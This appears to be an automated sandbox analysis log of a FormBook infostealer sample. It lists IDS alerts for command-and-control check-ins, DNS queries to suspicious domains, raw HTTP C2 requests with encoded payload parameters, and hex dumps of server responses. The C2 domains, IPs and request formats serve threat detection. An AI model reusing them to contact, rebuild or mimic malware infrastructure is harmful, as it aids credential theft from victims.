                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49735 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49711 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49711 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49723 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49727 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49743 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49741 -> 154.88.22.101:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49714 -> 23.225.160.132:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49713 -> 23.225.160.132:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49731 -> 104.21.95.160:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49754 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49754 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49728 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49717 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49744 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49749 -> 104.21.48.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49737 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49752 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49719 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49726 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49726 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49742 -> 154.88.22.101:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49742 -> 154.88.22.101:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49740 -> 154.88.22.101:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49747 -> 104.21.48.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49732 -> 104.21.95.160:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49750 -> 104.21.48.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49750 -> 104.21.48.1:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49734 -> 104.21.95.160:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49734 -> 104.21.95.160:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.soainsaat.xyz
                Source: DNS query: www.amayavp.xyz
                Source: DNS query: www.duwixushx.xyz
                Source: Joe Sandbox ViewIP Address: 149.88.81.190 149.88.81.190
                Source: Joe Sandbox ViewIP Address: 161.97.142.144 161.97.142.144
                Source: Joe Sandbox ViewIP Address: 161.97.142.144 161.97.142.144
                Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.8:49705
                Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.8:49705
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_004722EE
                Source: global trafficHTTP traffic detected: GET /xxr1/?3P=ZxaxIFQ&jNn=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM66l0nHsUGQdUfs4bd2jLDJzuKWSTJW9+MdVSz4bzmf2o9wQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.nb-shenshi.buzzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /sgdd/?jNn=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZSiHxO15Gr8xk7hOHDVFXExJKBXBlW4uFPtlrZZXFJuvZOA==&3P=ZxaxIFQ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.laohub10.netConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /rq1s/?jNn=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF1bV5lTdIrZK4z5JaRyWkNAYPXYBCqbiI2n7IpSyVWea/Pg==&3P=ZxaxIFQ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.xcvbj.asiaConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /rum2/?jNn=xMZmeyR85UPBdQXGVprUO1LR43iXmFfPz7pkSG2xpPpRtldOsCO9Ua+kpATSmsrk0H+UwmANflnCrdxtiygBnjZcvZIWQQve7723Pk1HFbXKcmbX65Etfa2fBZEFB8aOdg==&3P=ZxaxIFQ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.soainsaat.xyzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /d9ku/?jNn=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94K9aiv+zbDkEKhMSDsVMvwPhhINhuEU9ODct9Lj1wj6urmQ==&3P=ZxaxIFQ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.amayavp.xyzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /vg0z/?jNn=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTGqSKo7wbbDBvpzyjUmzrS97fS4i7YPii/B0AmEK1pqpQFw==&3P=ZxaxIFQ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.vayui.topConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /o362/?3P=ZxaxIFQ&jNn=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqD1uW41+CEwYhbzlB+9nxdj867jKwdHPO1yv4Ykeg9vUq/A== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.rgenerousrs.storeConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /jhb8/?jNn=0R31+Vq/Nm8msngZkniPPNslS216pvARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmv0JB40X+6ZYpMJWzP2nxEXACS3GxK9okeiaSzZusyrXZl7w==&3P=ZxaxIFQ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.t91rl7.proConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
                Source: global trafficDNS traffic detected: DNS query: www.nb-shenshi.buzz
                Source: global trafficDNS traffic detected: DNS query: www.laohub10.net
                Source: global trafficDNS traffic detected: DNS query: www.xcvbj.asia
                Source: global trafficDNS traffic detected: DNS query: www.soainsaat.xyz
                Source: global trafficDNS traffic detected: DNS query: www.amayavp.xyz
                Source: global trafficDNS traffic detected: DNS query: www.vayui.top
                Source: global trafficDNS traffic detected: DNS query: www.rgenerousrs.store
                Source: global trafficDNS traffic detected: DNS query: www.t91rl7.pro
                Source: global trafficDNS traffic detected: DNS query: www.learnwithus.site
                Source: global trafficDNS traffic detected: DNS query: www.cuthethoi.online
                Source: global trafficDNS traffic detected: DNS query: www.rafconstrutora.online
                Source: global trafficDNS traffic detected: DNS query: www.7vh2wy.top
                Source: global trafficDNS traffic detected: DNS query: www.duwixushx.xyz
                Source: unknownHTTP traffic detected: POST /gprpendvhdrdevgd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 02:29:38 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:32:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nQpzubfE7qDjNsccnRBOi91m%2F830GH6MVHFluiwayqpVG0TZlnjwobWd9vErmg0KUCPl6zRsX%2Fg9tx%2B697jRxTuy5g0n2RTdT69UejvYG0F77lZu8%2FuGOjRsoUu2Gr31"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90017ea29cea80dc-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1705&rtt_var=852&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=742&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:32:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W34E5nxdZdtBhfjX%2BmpzPfHvbzTdLG2KayogoGRoOS0%2BwkxY8%2FG%2Bc30IqOSkUhoY3mLrrtZcILceD1k2%2Famu%2BMvBgQFoc%2BkDaie7qxDVyuG154v0Ptzs6EqXJ%2B2i7bs0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90017eb29c0c43be-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1985&min_rtt=1985&rtt_var=992&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=762&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:32:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OY16Brr0AgkwysVM%2BDM%2FBWfwLR3vSZem4EL4kHPhJaaLtz803TxVr4fjOTky6g2QgAo8W8M992RgaGh3i8ia9AsE70ctgq%2BC%2F3qTUHZBVScLW9VUqL3aLikHAhnxP9zf"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90017ec27d2b0f8f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1468&min_rtt=1468&rtt_var=734&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1779&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:32:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E4%2B09MgFYcWAG5J8mNztaSHuhAS%2BUXSaIHMNKNC3fLXjktZ%2BS5aLCQtf78CZeb6Ze5ZnlEcUJ9eGpRmA6SWwfYH76NOyUHQt4CSoI%2F%2BTDYUKw3oQf2tofayg9wGQbRkc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90017ed26b616a55-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1535&min_rtt=1535&rtt_var=767&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=487&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:32:22 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LQJUFn2ysBWSq%2FkbYxs9KHa05nO%2Fhqtq5JuaY7%2BG1YqK%2FFw8x%2BtrmHEViHoNM2Xo067RpJbE5ZoWSljrDizrFfaEtCDQAtJfy0i6z6rJ%2BgthntL0loS8KykX%2B0SfK%2B6giIL4GqCZwwI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90017ef5b9192394-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1970&min_rtt=1970&rtt_var=985&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=766&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:32:25 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mWxO7Sd32UzVCZ2kFvXHtmYu8vBvniSi%2B%2F8iSkx0pjlqBTgs6fXJ8dpelLXn2X5VpyIm56XsR2THPQwulnhKWtpFGiteuarT5NqgEepPMpZwXnzykEE1LIDk5nqg09DXM818gU9Phys%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90017f05ab61334e-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1964&min_rtt=1964&rtt_var=982&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=786&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 